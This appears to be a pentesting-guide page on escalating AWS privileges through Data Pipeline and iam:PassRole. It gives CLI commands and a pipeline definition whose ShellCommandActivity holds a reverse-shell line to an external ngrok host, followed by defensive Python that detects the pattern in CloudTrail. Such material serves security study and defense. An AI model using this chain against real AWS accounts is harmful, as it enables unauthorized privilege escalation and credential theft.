AWS - Datapipeline Privesc

datapipeline

For more info about datapipeline check:

AWS - DataPipeline, CodePipeline & CodeCommit Enum

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Users with these permissions can escalate privileges by creating a Data Pipeline to execute arbitrary commands using the permissions of the assigned role:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations:

{
    "objects": [
        {
            "id": "CreateDirectory",
            "type": "ShellCommandActivity",
            "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
            "runsOn": {"ref": "instance"}
        },
        {
            "id": "Default",
            "scheduleType": "ondemand",
            "failureAndRerunMode": "CASCADE",
            "name": "Default",
            "role": "assumable_datapipeline",
            "resourceRole": "assumable_datapipeline"
        },
        {
            "id": "instance",
            "name": "instance",
            "type": "Ec2Resource",
            "actionOnTaskFailure": "terminate",
            "actionOnResourceFailure": "retryAll",
            "maximumRetries": "1",
            "instanceType": "t2.micro",
            "securityGroups": ["default"],
            "role": "assumable_datapipeline",
            "resourceRole": "assumable_ec2_profile_instance"
        }
    ]
}

Note that the "role" and "resourceRole" of the Default object and the "role" of the Ec2Resource object (assumable_datapipeline above) need to be a role assumable by datapipeline.amazonaws.com, while the "resourceRole" of the Ec2Resource object (assumable_ec2_profile_instance above) needs to be a role assumable by ec2.amazonaws.com that has an EC2 instance profile.

Moreover, the command runs on the EC2 instance, so it only has access to the credentials of the instance profile role assumable by EC2, not to the Data Pipeline role (so that is the only one you can steal).

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
    --pipeline-definition file:///pipeline/definition.json

The pipeline definition file, crafted by the attacker, includes directives to execute commands or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.

Potential Impact: Direct privesc to the EC2 instance profile role specified in the pipeline definition.
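From the detection side, the chain above leaves three Data Pipeline API calls in CloudTrail by the same principal within a short window, the middle one carrying a ShellCommandActivity object. The following Python is an added example (not HackTricks' code) that flags that sequence over constructed sample records; the pipelineObjects/fields layout assumed for requestParameters follows the PutPipelineDefinition API request shape, and the account, user and pipeline ids are placeholders.

```python
from collections import defaultdict
from datetime import datetime, timedelta

CHAIN = ("CreatePipeline", "PutPipelineDefinition", "ActivatePipeline")
SRC = "datapipeline.amazonaws.com"
ACTOR = {"arn": "arn:aws:iam::111122223333:user/dev"}  # constructed sample principal

# Constructed sample CloudTrail records (not real logs). pipelineObjects/fields follows
# the shape of the PutPipelineDefinition API request mirrored in requestParameters.
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": SRC, "eventName": "CreatePipeline",
     "userIdentity": ACTOR, "requestParameters": {"name": "my_pipeline"},
     "responseElements": {"pipelineId": "df-EXAMPLE1"}},
    {"eventTime": "2024-01-01T10:01:00Z", "eventSource": SRC, "eventName": "PutPipelineDefinition",
     "userIdentity": ACTOR, "requestParameters": {"pipelineId": "df-EXAMPLE1", "pipelineObjects": [
         {"id": "CreateDirectory", "fields": [{"key": "type", "stringValue": "ShellCommandActivity"}]},
         {"id": "Default", "fields": [{"key": "role", "stringValue": "assumable_datapipeline"}]}]}},
    {"eventTime": "2024-01-01T10:02:00Z", "eventSource": SRC, "eventName": "ActivatePipeline",
     "userIdentity": ACTOR, "requestParameters": {"pipelineId": "df-EXAMPLE1"}},
]

def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def has_shell_activity(put_event):
    """True if any object in a PutPipelineDefinition call is typed ShellCommandActivity."""
    return any(f.get("key") == "type" and f.get("stringValue") == "ShellCommandActivity"
               for obj in put_event["requestParameters"].get("pipelineObjects", [])
               for f in obj.get("fields", []))

def detect_pipeline_privesc(events, window=timedelta(minutes=30)):
    """Return [(actor_arn, pipeline_id)] for pipelines that one principal created,
    defined with a ShellCommandActivity and activated within `window`."""
    by_pipeline = defaultdict(list)
    for e in events:
        if e.get("eventSource") == SRC and e.get("eventName") in CHAIN:
            # CreatePipeline only reports the id in the response, the others in the request
            pid = (e.get("requestParameters") or {}).get("pipelineId") or \
                  (e.get("responseElements") or {}).get("pipelineId")
            by_pipeline[pid].append(e)
    findings = []
    for pid, evs in by_pipeline.items():
        evs.sort(key=_ts)
        seen = {e["eventName"]: e for e in evs}
        actors = {e["userIdentity"]["arn"] for e in evs}
        if (all(n in seen for n in CHAIN) and len(actors) == 1
                and _ts(evs[-1]) - _ts(evs[0]) <= window
                and has_shell_activity(seen["PutPipelineDefinition"])):
            findings.append((actors.pop(), pid))
    return findings
```

A pipeline that is only created, or whose definition carries no ShellCommandActivity, is not flagged; in production the same logic should also be joined with the iam:PassRole usage visible in the same events.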
